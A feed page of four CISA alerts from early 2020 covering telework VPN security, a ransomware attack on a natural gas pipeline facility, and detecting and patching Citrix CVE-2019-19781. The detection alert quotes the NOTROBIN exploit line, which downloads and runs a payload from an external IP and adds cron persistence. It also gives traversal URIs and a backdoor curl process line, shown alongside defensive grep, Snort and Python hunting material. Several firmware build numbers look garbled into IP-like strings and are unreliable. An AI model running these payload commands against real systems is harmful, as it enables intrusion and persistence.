Current security issues, vulnerabilities, and exploits
AA20-073A: Enterprise VPN Security
by CISA on March 13, 2020 at 12:08 pm
Original release date: March 13, 2020

Summary

As organizations prepare for possible impacts of Coronavirus Disease 2019 (COVID-19), many may consider alternate workplace options for their employees. Remote work options—or telework—require an enterprise virtual private network (VPN) solution to connect employees to an organization’s information technology (IT) network. As organizations elect to implement telework, the Cybersecurity and Infrastructure Security Agency (CISA) encourages organizations to adopt a heightened state of cybersecurity.

Technical Details

The following are cybersecurity considerations regarding telework.

- As organizations use VPNs for telework, more vulnerabilities are being found and targeted by malicious cyber actors.
- As VPNs are 24/7, organizations are less likely to keep them updated with the latest security updates and patches.
- Malicious cyber actors may increase phishing emails targeting teleworkers to steal their usernames and passwords.
- Organizations that do not use multi-factor authentication (MFA) for remote access are more susceptible to phishing attacks.
- Organizations may have a limited number of VPN connections, after which point no other employee can telework. With decreased availability, critical business operations may suffer, including IT security personnel’s ability to perform cybersecurity tasks.

Mitigations

CISA encourages organizations to review the following recommendations when considering alternate workplace options.

- Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and security configurations. See CISA Tips Understanding Patches and Securing Network Infrastructure Devices.
- Alert employees to an expected increase in phishing attempts. See CISA Tip Avoiding Social Engineering and Phishing Attacks.
- Ensure IT security personnel are prepared to ramp up the following remote access cybersecurity tasks: log review, attack detection, and incident response and recovery. Per the National Institute of Standards and Technology (NIST) Special Publication 800-46 v.2, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security, these tasks should be documented in the configuration management policy.
- Implement MFA on all VPN connections to increase security. If MFA is not implemented, require teleworkers to use strong passwords. (See CISA Tips Choosing and Protecting Passwords and Supplementing Passwords for more information.)
- Ensure IT security personnel test VPN limitations to prepare for mass usage and, if possible, implement modifications—such as rate limiting—to prioritize users that will require higher bandwidths.
- Contact CISA to report incidents, phishing, malware, and other cybersecurity concerns.

References

- NIST Special Publication 800-46 v.2, Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security
- CISA Cyber Essentials
- CERT/CC: VPN - A Gateway for Vulnerabilities
- National Security Agency Cybersecurity Advisory: Mitigating Recent VPN Vulnerabilities
- CISA Insights: Risk Management for Novel Coronavirus (COVID-19)
- Telework.gov Guidance

Revisions

- March 13, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

AA20-049A: Ransomware Impacting Pipeline Operations
by CISA on February 18, 2020 at 1:06 pm
Original release date: February 18, 2020

Summary

Note: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework. See the MITRE ATT&CK for Enterprise and ATT&CK for Industrial Control Systems (ICS) frameworks for all referenced threat actor techniques and mitigations.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages asset owner operators across all critical infrastructure sectors to review the below threat actor techniques and ensure the corresponding mitigations are applied.

CISA responded to a cyberattack affecting control and communication assets on the operational technology (OT) network of a natural gas compression facility. A cyber threat actor used a Spearphishing Link [T1192] to obtain initial access to the organization’s information technology (IT) network before pivoting to its OT network. The threat actor then deployed commodity ransomware to Encrypt Data for Impact [T1486] on both networks. Specific assets experiencing a Loss of Availability [T826] on the OT network included human machine interfaces (HMIs), data historians, and polling servers. Impacted assets were no longer able to read and aggregate real-time operational data reported from low-level OT devices, resulting in a partial Loss of View [T829] for human operators. The attack did not impact any programmable logic controllers (PLCs) and at no point did the victim lose control of operations. Although the victim’s emergency response plan did not specifically consider cyberattacks, the decision was made to implement a deliberate and controlled shutdown to operations. This lasted approximately two days, resulting in a Loss of Productivity and Revenue [T828], after which normal operations resumed. CISA is providing this Alert to help administrators and network defenders protect their organizations against this and similar ransomware attacks.

Technical Details

Network and Assets

- The victim failed to implement robust segmentation between the IT and OT networks, which allowed the adversary to traverse the IT-OT boundary and disable assets on both networks.
- The threat actor used commodity ransomware to compromise Windows-based assets on both the IT and OT networks. Assets impacted on the organization’s OT network included HMIs, data historians, and polling servers.
- Because the attack was limited to Windows-based systems, PLCs responsible for directly reading and manipulating physical processes at the facility were not impacted.
- The victim was able to obtain replacement equipment and load last-known-good configurations to facilitate the recovery process.
- All OT assets directly impacted by the attack were limited to a single geographic facility.

Planning and Operations

- At no time did the threat actor obtain the ability to control or manipulate operations. The victim took offline the HMIs that read and control operations at the facility. A separate and geographically distinct central control office was able to maintain visibility but was not instrumented for control of operations.
- The victim’s existing emergency response plan focused on threats to physical safety and not cyber incidents. Although the plan called for a full emergency declaration and immediate shutdown, the victim judged the operational impact of the incident as less severe than those anticipated by the plan and decided to implement limited emergency response measures. These included a four-hour transition from operational to shutdown mode combined with increased physical security.
- Although the direct operational impact of the cyberattack was limited to one control facility, geographically distinct compression facilities also had to halt operations because of pipeline transmission dependencies. This resulted in an operational shutdown of the entire pipeline asset lasting approximately two days.
- Although they considered a range of physical emergency scenarios, the victim’s emergency response plan did not specifically consider the risk posed by cyberattacks. Consequently, emergency response exercises also failed to provide employees with decision-making experience in dealing with cyberattacks.
- The victim cited gaps in cybersecurity knowledge and the wide range of possible scenarios as reasons for failing to adequately incorporate cybersecurity into emergency response planning.

Mitigations

Asset owner operators across all sectors are encouraged to consider the following mitigations using a risk-based assessment strategy.

Planning and Operational Mitigations

- Ensure the organization’s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and loss of safety. In particular, response playbooks should identify criteria to distinguish between events requiring deliberate operational shutdown versus low-risk events that allow for operations to continue.
- Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications. Capture lessons learned in emergency response playbooks.
- Allow employees to gain decision-making experience via tabletop exercises that incorporate loss of visibility and control scenarios. Capture lessons learned in emergency response playbooks.
- Identify single points of failure (technical and human) for operational visibility. Develop and test emergency response playbooks to ensure there are redundant channels that allow visibility into operations when one channel is compromised.
- Implement redundant communication capabilities between geographically separated facilities responsible for the operation of a single pipeline asset. Coordinate planning activities across all such facilities.
- Recognize the physical risks that cyberattacks pose to safety and integrate cybersecurity into the organization’s safety training program.
- Ensure the organization’s security program and emergency response plan consider third parties with legitimate need for OT network access, including engineers and vendors.

Technical and Architectural Mitigations

- Implement and ensure robust Network Segmentation [M1030] between IT and OT networks to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone (DMZ) that eliminates unregulated communication between the IT and OT networks.
- Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to Filter Network Traffic [M1037] and monitor communications between zones. Prohibit Industrial Control System (ICS) protocols from traversing the IT network.
- Require Multi-Factor Authentication [M1032] to remotely access the OT and IT networks from external sources.
- Implement regular Data Backup [M1053] procedures on both the IT and OT networks. Ensure that backups are regularly tested and isolated from network connections that could enable the spread of ransomware.
- Ensure user and process accounts are limited through Account Use Policies [M1036], User Account Control [M1052], and Privileged Account Management [M1026]. Organize access rights based on the principles of least privilege and separation of duties.
- Enable strong spam filters to prevent phishing emails from reaching end users. Implement a User Training [M1017] program to discourage users from visiting malicious websites or opening malicious attachments. Filter emails containing executable files from reaching end users.
- Filter Network Traffic [M1037] to prohibit ingress and egress communications with known malicious Internet Protocol (IP) addresses.
- Prevent users from accessing malicious websites using Uniform Resource Locator (URL) blacklists and/or whitelists.
- Update Software [M1051], including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system.
- Set Antivirus/Antimalware [M1049] programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.
- Implement Execution Prevention [M1038] by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
- Implement Execution Prevention [M1038] via application whitelisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder.
- Limit Access to Resources over Network [M1035], especially by restricting Remote Desktop Protocol (RDP). If after assessing risks RDP is deemed operationally necessary, restrict the originating sources and require Multi-Factor Authentication [M1032].

Resources

- CISA Ransomware One-Pager and Technical Document (CISA, 2019)
- CISA Insights: Ransomware Outbreak (CISA, 2019)
- Pipeline Cybersecurity Initiative (CISA, 2018)
- CISA Webinar: Combating Ransomware (CISA, 2018)
- Framework for Improving Critical Infrastructure Cybersecurity (NIST, 2018)
- Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events (NIST, 2018)
- Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events (NIST, 2018)
- Pipeline Security Guidelines (TSA, 2018)
- NIST SP 800-11: Data Integrity: Recovering from Ransomware and Other Destructive Events (NIST, 2017)
- Guide to Industrial Control Systems (ICS) Security (NIST, 2015)
- Oil and Natural Gas Subsector Cybersecurity Capability Maturity Model (DOE, 2014)

Revisions

- February 18, 2020: Initial Version

AA20-031A: Detecting Citrix CVE-2019-19781
by CISA on January 31, 2020 at 6:07 pm
Original release date: January 31, 2020 | Last revised: February 18, 2020

Summary

Unknown cyber network exploitation (CNE) actors have successfully compromised numerous organizations that employed vulnerable Citrix devices through a critical vulnerability known as CVE-2019-19781.

Though mitigations were released on the same day Citrix announced CVE-2019-19781, organizations that did not appropriately apply the mitigations were likely to be targeted once exploit code began circulating on the internet a few weeks later.

Compromised systems cannot be remediated by applying software patches that were released to fix the vulnerability. Once CNE actors establish a foothold on an affected device, their presence remains even though the original attack vector has been closed.

The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Alert to provide tools and technologies to assist with detecting the presence of these CNE actors. Unpatched systems and systems compromised before the updates were applied remain susceptible to exploitation.

Contact CISA or the FBI to report an intrusion or to request assistance.

Technical Details

Detection

CISA has developed the following procedures for detecting a CVE-2019-19781 compromise.

HTTP Access and Error Log Review

Context: Host Hunt
Type: Methodology

The impacted Citrix products utilize Apache for web server software, and as a result, HTTP access and error logs should be available on the system for review in /var/log. Log files httpaccess.log and httperror.log should both be reviewed for the following Uniform Resource Identifiers (URIs), found in the proof of concept exploit that was released.

    '*/../vpns/*'
    '*/vpns/cfg/smb.conf'
    '*/vpns/portal/scripts/newbm.pl*'
    '*/vpns/portal/scripts/rmbm.pl*'
    '*/vpns/portal/scripts/picktheme.pl*'

Note: These URIs were observed in Security Information and Event Management detection content provided by https://github.com/Neo23x0/sigma/blob/master/rules/web/web_citrix_cve_2019_19781_exploit.yml.

Per TrustedSec, a sign of successful exploitation would be a POST request to a URI containing /../ or /vpn, followed by a GET request to an XML file. If any exploitation activity exists—attempted or successful—analysts should be able to identify the attacking Internet Protocol address(es). Tyler Hudak’s blog provided sample logs indicating what a successful attack would look like.

    10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT "
    10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT"

Additionally, FireEye provided the following grep commands to assist with log review and help to identify suspicious activity.

    grep -iE 'POST.*\.pl HTTP/1\.1\" 200 ' /var/log/httpaccess.log -A 1
    grep -iE 'GET.*\.xml HTTP/1\.1\" 200' /var/log/httpaccess.log -B 1

Running Processes Review

Context: Host Hunt
Type: Methodology

Reviewing the running processes on a system suspected of compromise for processes running under the nobody user can identify potential backdoors.

    ps auxd | grep nobody

Analysts should review the ps output for suspicious entries such as this:

    nobody 63390 0.0 0.0 8320 16 ?? I 1:35PM 0:00.00 | | `-- sh -c uname & curl -o - http://10.1.1.2/backdoor

Further pivoting can be completed using the Process ID from the ps output:

    lsof -p <pid>

Due to the nature of this exploit, it is likely that any processes related to a backdoor would be running under the httpd process.

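The HTTP access log review above (a successful POST to a Perl script through a suspicious URI, followed by a successful GET of an XML file from the same address) can be automated for offline triage of exported logs. The following is an added example, not code from CISA, TrustedSec or FireEye; the function names, the five-minute correlation window and the last two log lines are assumptions constructed for illustration, and it goes slightly beyond the grep commands by also decoding percent-encoded URIs.

```python
import re
from datetime import datetime, timedelta
from fnmatch import fnmatchcase
from urllib.parse import unquote

# URI patterns listed in the alert (from the referenced Sigma rule).
URI_PATTERNS = [
    "*/../vpns/*",
    "*/vpns/cfg/smb.conf",
    "*/vpns/portal/scripts/newbm.pl*",
    "*/vpns/portal/scripts/rmbm.pl*",
    "*/vpns/portal/scripts/picktheme.pl*",
]

# Apache access log line: client, identity, user, [time], "request", status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/\d\.\d" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return the fields of one access log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # Drop the query string, then decode %2e%2e-style encodings before matching.
    path = unquote(m["uri"].split("?", 1)[0])
    return {
        "ip": m["ip"],
        "time": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": path,
        "status": int(m["status"]),
    }


def is_suspicious(path):
    lowered = path.lower()
    return any(fnmatchcase(lowered, pattern) for pattern in URI_PATTERNS)


def hunt(lines, window=timedelta(minutes=5)):
    """Flag suspicious requests and POST(.pl, 200) -> GET(.xml, 200) pairs.

    The window is an assumed tuning value, not one given in the alert.
    """
    pending_posts = {}  # client IP -> most recent successful suspicious POST
    findings = {"suspicious": [], "successful": []}
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        suspicious = is_suspicious(ev["path"])
        if suspicious:
            # Attempted or successful: either way it names the source address.
            findings["suspicious"].append(
                (ev["ip"], ev["method"], ev["path"], ev["status"])
            )
        if ev["status"] != 200:
            continue
        lowered = ev["path"].lower()
        if ev["method"] == "POST" and suspicious and lowered.endswith(".pl"):
            pending_posts[ev["ip"]] = ev
        elif ev["method"] == "GET" and lowered.endswith(".xml"):
            post = pending_posts.get(ev["ip"])
            if post and timedelta(0) <= ev["time"] - post["time"] <= window:
                findings["successful"].append((ev["ip"], post["path"], ev["path"]))
    return findings


# First two lines are the sample from the alert; the last two are constructed.
SAMPLE_LOG = '''\
10.1.1.1 - - [10/Jan/2020:13:23:51 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143 "https://10.1.1.2/" "USERAGENT "
10.1.1.1 - - [10/Jan/2020:13:23:53 +0000] "GET /vpn/../vpns/portal/backdoor.xml HTTP/1.1" 200 941 "-" "USERAGENT"
10.1.1.7 - - [10/Jan/2020:14:02:10 +0000] "GET /vpn/index.html HTTP/1.1" 200 3120 "-" "USERAGENT"
10.1.1.9 - - [10/Jan/2020:14:05:44 +0000] "GET /vpn/%2e%2e/vpns/cfg/smb.conf HTTP/1.1" 403 199 "-" "USERAGENT"
'''.splitlines()

if __name__ == "__main__":
    result = hunt(SAMPLE_LOG)
    for ip, post_path, get_path in result["successful"]:
        print(f"likely successful exploitation from {ip}: {post_path} -> {get_path}")
    for ip in sorted({hit[0] for hit in result["suspicious"]}):
        print(f"suspicious URI requested by {ip}")
```

Rotated and compressed logs (.gz) need to be decompressed and fed through the same function, since earlier activity may only exist in the archives.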
Checking for NOTROBIN Presence

Context: Host Hunt
Type: Methodology

    pkill -9 netscalerd; rm /var/tmp/netscalerd; mkdir /tmp/.init; curl -k hxxps://95.179.163[.]186/wp-content/uploads/2018/09/64d4c2d3ee56af4f4ca8171556d50faa -o /tmp/.init/httpd; chmod 744 /tmp/.init/httpd; echo "* * * * * /var/nstmp/.nscache/httpd" | crontab -; /tmp/.init/httpd &"

The above is the NOTROBIN Bash exploit code. To check for NOTROBIN presence, analysts should look for the staging directory at /tmp/.init as well as httpd processes running as a cron job.

Running the following command should return the path to the created staging directory while taking all of the errors and creating a file located at /tmp/error.log:

    find / -name ".init" 2> /tmp/error.log

Additional /var/log Review

Context: Host Hunt
Type: Methodology

Analysts should focus on reviewing the following logs in /var/log on the Citrix device, if available. The underlying operating system is based on FreeBSD, and the logs are similar to what would be found on a Linux system. Analysts should focus on log entries related to the nobody user or (null) on and should try to identify any suspicious commands that may have been run, such as whoami or curl. Please keep in mind that logs are rotated and compressed, and additional activity may be found in the archives (.gz files) for each log.

- bash.log

  Sample Log Entry:

      Jan 10 13:35:47 <local7.notice> ns bash: nobody on /dev/pts/3 shell_command="hostname"

  Note: The bash log can provide the user (nobody), command (hostname), and process id (63394) related to the nefarious activity.

- sh.log
- notice.log

Check Crontab for Persistence

Context: Host Hunt
Type: Methodology

As with running processes and log entries, any cron jobs created by the user nobody are a cause for concern and likely related to a persistence mechanism established by an attacker. Additionally, search for a httpd process within the crontab to determine if a system has been affected by NOTROBIN.
Analysts can review entries on a live system using the following command:

    crontab -l -u nobody

Existence of Unusual Files

Context: Host Hunt
Type: Methodology

Open-source outlets have reported that during incident response activities, attackers exploiting this vulnerability have been placing malicious files in the following directories. Analysts should review file listings for these directories and determine if any suspicious files are present on the server.

    /netscaler/portal/templates
    /var/tmp/netscaler/portal/templates

Snort Alerts

Context: Network Alert
Type: Signatures

Although most activity related to exploitation of the Citrix vulnerability would use SSL, FireEye noted that an HTTP scanner is available to check for the vulnerability. The following Snort rules were provided in FireEye’s blog post and would likely indicate a vulnerable Citrix server. These rules should be tuned for the environment and restricted to the IP addresses of the Citrix server(s) to reduce potential false positives.

    alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .CONF response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"al]|0d0a|"; distance:0; content:"encrypt passwords"; distance:0; content:"name resolve order"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)

    alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Potential CVE-2019-19781 vulnerable .PL response"; flow:established,to_client; content:"HTTP/1."; depth:7; content:"200 OK"; distance:1; content:"|0d0a|Server: Apache"; distance:0; content:"|0d0a|Connection: Keep-Alive"; content:"|0d0a0d0a3c48544d4c3e0a3c424f44593e0a3c534352495054206c616e67756167653d6a61766173637269707420747970653d746578742f6a6176617363726970743e0a2f2f706172656e742e77696e646f772e6e735f72656c6f616428293b0a77696e646f772e636c6f736528293b0a3c2f5343524950543e0a3c2f424f44593e0a3c2f48544d4c3e0a|"; reference:cve,2019-19781; reference:url,https://www.fireeye.com/blog/products-and-services/2020/01/rough-patch-promise-it-will-be-200-ok.html; sid:201919781; rev:1;)

Suspicious Network Traffic

Context: Network Hunt
Type: Methodology

From a network perspective, this vulnerability will likely not be detectable, given that the traffic will likely be encrypted (SSL). Additionally, due to where they sit on networks, devices such as these are typically not covered in traditional network monitoring and ingress traffic to the device may not be part of a normal SPAN port configuration. In the event network monitoring is available and attackers are using HTTP versions of this exploit, CISA recommends looking for URIs containing /../ or /vpns/ to identify potentially malicious activity.
It is also worth surveying the traffic for any requests to .xml files or perl (.pl) files as well, as this would not be consistent with normal Citrix web activity. As with the web logs, analysts would be looking for a successful POST request followed by a successful GET request with the aforementioned characteristics.

Given that a compromise occurred, activity to look for would be outbound traffic from the Citrix server, both to internal and external hosts. In theory, if an attacker placed a backdoor on the system, it should be connecting outbound to a command and control server. This traffic would most likely be anomalous (outbound TCP Port 80 or 443), given that one would only expect to see inbound TCP/443 traffic to the Citrix server as normal activity.

If an attacker is leveraging a Citrix device as an entry point to an organization, anomalous internal traffic could potentially be visible in bro data such as scanning, file transfers, or lateral movement. An exception to internal traffic is that the Citrix ADC device is much more than just an SSL VPN device and is used for multiple types of load balancing. As a result, an ADC device may be communicating with internal systems legitimately (web servers, file servers, custom applications, etc.).

Inbound Exploitation Activity (Suspicious URIs)

    index=bro dest=<CITRIX_IP_ADDR> sourcetype=bro_http uri=*/../* OR uri=*/vpn* OR uri=*.pl OR uri=*.xml

Outbound Traffic Search (Backdoor C2)

    index=bro sourcetype=bro_conn src=<CITRIX_IP_ADDR> dest!=<INTERNAL_NET> | stats count by src dest dest_port | sort -count

The following resources provide additional detection measures.

- Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781. The tool aids customers with detecting potential IOCs based on known attacks and exploits.
- The National Security Agency released a Cybersecurity Advisory on CVE-2019-19781 with additional detection measures.
- CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.

Impact

CVE-2019-19781 is an arbitrary code execution vulnerability that has been detected in exploits in the wild. An attacker can exploit this vulnerability to take control of an affected system.

The vulnerability affects the following appliances:

- Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before 10.5.70.12
- Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 126.96.36.199
- Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 188.8.131.52
- Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 184.108.40.206
- Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 220.127.116.11
- Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

Mitigations

The resources provided include steps for standalone, HA pairs, and clustered Citrix instances.

- Use Citrix's tool to check for the vulnerability.
    https://support.citrix.com/article/CTX269180
- Use an open-source utility to check for the vulnerability or previous device compromise.
    https://github.com/cisagov/check-cve-2019-19781
    https://github.com/x1sec/citrixmash_scanner
    https://github.com/fireeye/ioc-scanner-CVE-2019-19781/releases/tag/v1.2
- Follow instructions from Citrix to mitigate the vulnerability.
    https://support.citrix.com/article/CTX267679
    https://support.citrix.com/article/CTX267027
- Upgrade firmware to a patched version.
  - Subscribe to Citrix Alerts for firmware updates.
      https://support.citrix.com/user/alerts
  - Patch devices to the most current version.
      https://www.citrix.com/downloads/citrix-gateway/
      https://www.citrix.com/downloads/citrix-adc/
      https://www.citrix.com/downloads/citrix-sd-wan/

Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible gateway appliances to require user authentication for the VPN before being able to reach these appliances.

CISA's Tip Handling Destructive Malware provides additional information, including best practices and incident response strategies.

References

- Citrix blog: Citrix releases final fixes for CVE-2019-19781
- GitHub web_citrix_cve_2019_19781_exploit.yml
- TrustedSec blog: NetScaler Remote Code Execution Forensics
- FireEye blog: Rough Patch: I Promise It'll Be 200 OK (Citrix ADC CVE-2019-19781)
- IOC scanning tool for CVE-2019-19781
- NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability
- CISA Vulnerability Test Tool

Revisions

- January 31, 2020: Initial Version
- February 7, 2020: Added link to the Australian Cyber Security Centre script

AA20-020A: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP
by CISA on January 20, 2020 at 2:54 pm
Original release date: January 20, 2020 | Last revised: January 27, 2020

Summary

Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781.

On January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0.
On January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances.
On January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0.
On January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.

A remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.

The Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.

Timeline of Specific Events

- December 17, 2019 – Citrix released Security Bulletin CTX267027 with mitigation steps.
- January 8, 2020 – The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability, and CISA released a Current Activity entry.
- January 10, 2020 – The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.
- January 11, 2020 – Citrix released blog post on CVE-2019-19781 with timeline for fixes.
- January 13, 2020 – CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.
- January 16, 2020 – Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.
- January 19, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.
- January 22, 2020 – Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.
- January 22, 2020 – Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.
- January 23, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.
- January 24, 2020 – Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5.

Technical Details

Impact

On December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.

The vulnerability affects the following appliances:

- Citrix NetScaler ADC and NetScaler Gateway version 10.5 – all supported builds before 10.5.70.12
- Citrix ADC and NetScaler Gateway version 11.1 – all supported builds before 18.104.22.168
- Citrix ADC and NetScaler Gateway version 12.0 – all supported builds before 22.214.171.124
- Citrix ADC and NetScaler Gateway version 12.1 – all supported builds before 126.96.36.199
- Citrix ADC and Citrix Gateway version 13.0 – all supported builds before 188.8.131.52
- Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO – all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).

Detection Measures

Citrix and FireEye Mandiant released an IOC scanning tool for CVE-2019-19781 on January 22, 2020. The tool aids customers with detecting potential IOCs based on known attacks and exploits.

See the National Security Agency’s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.

CISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781. CISA encourages administrators to visit CISA’s GitHub page to download and run the tool.

Mitigations

CISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.

The fixed builds can be downloaded from Citrix Downloads pages for Citrix ADC, Citrix Gateway, and Citrix SD-WAN.

Until the appropriate update is implemented, users and administrators should apply Citrix’s interim mitigation steps for CVE-2019-19781. Verify the successful application of the above mitigations by using the tool in CTX269180 – CVE-2019-19781 – Verification ToolTest. Note: these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.

Refer to table 1 for Citrix’s fix schedule.

Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781

Vulnerable Appliance                       | Firmware Update               | Release Date
-------------------------------------------|-------------------------------|-----------------
Citrix ADC and Citrix Gateway version 10.5 | Refresh Build 10.5.70.12      | January 24, 2020
Citrix ADC and Citrix Gateway version 11.1 | Refresh Build 184.108.40.206  | January 19, 2020
Citrix ADC and Citrix Gateway version 12.0 | Refresh Build 220.127.116.11  | January 19, 2020
Citrix ADC and Citrix Gateway version 12.1 | Refresh Build 18.104.22.168   | January 23, 2020
Citrix ADC and Citrix Gateway version 13.0 | Refresh Build 22.214.171.124  | January 23, 2020
Citrix SD-WAN WANOP Release 10.2.6         | Build 10.2.6b                 | January 22, 2020
Citrix SD-WAN WANOP Release 11.0.3         | Build 11.0.3b                 | January 22, 2020

Administrators should review NSA’s Citrix Advisory for other mitigations, such as applying the following defense-in-depth strategy:

“Consider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.”

References

- Citrix blog: Citrix releases final fixes for CVE-2019-19781
- Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway
- United Kingdom National Cyber Security Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability
- CERT/CC Vulnerability Note VU#619785
- CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability
- NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway
- Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability
- CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability
- GitHub: CISAgov – check-cve-2019-19781
- Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated
- Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP
- Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781
- Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0
- Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781

Revisions

- January 20, 2020: Initial Version
- January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool
- January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and Gateway versions 10.5, 12.1, and 13.0
- January 27, 2020: Updated vulnerable versions of ADC and Gateway version 10.5